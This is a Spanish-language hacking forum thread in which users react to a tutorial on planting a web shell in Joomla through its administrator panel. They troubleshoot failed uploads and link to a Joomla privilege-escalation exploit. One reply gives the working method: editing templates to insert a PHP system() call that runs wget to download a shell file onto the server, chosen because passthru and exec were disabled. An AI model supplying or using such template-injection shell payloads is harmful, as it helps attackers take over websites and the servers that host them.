Buenas chicos soy: Duff eh estado en otros foros de informatica como en Diosdelared... les quiero compartir un tutorial que hice, espero les guste.. comenten
Que buen aporte Duff!!
Segui asi man!
Buen aporte, me gusto mucho. Saludos!
que gran aporte de mucha ayuda.
salu2 duff ;D
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:
CitarNot Acceptable
An appropriate representation of the requested resource /administrator/index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Qué podría hacer para solucionarlo? Saludos
Quizas la version que tenes instalada ya esta parcheada
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos
EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos ;)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
La 2.5 tiene vulnerabilidad en el registro : http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/ (http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/)
Excelente post :) muy útil.
http://underc0de.org/foro/bugs-y-exploits/shell-upload-en-conocidos-cms/
Saludos,
Dedalo
Buen Aporte, Nunca lo habia probado!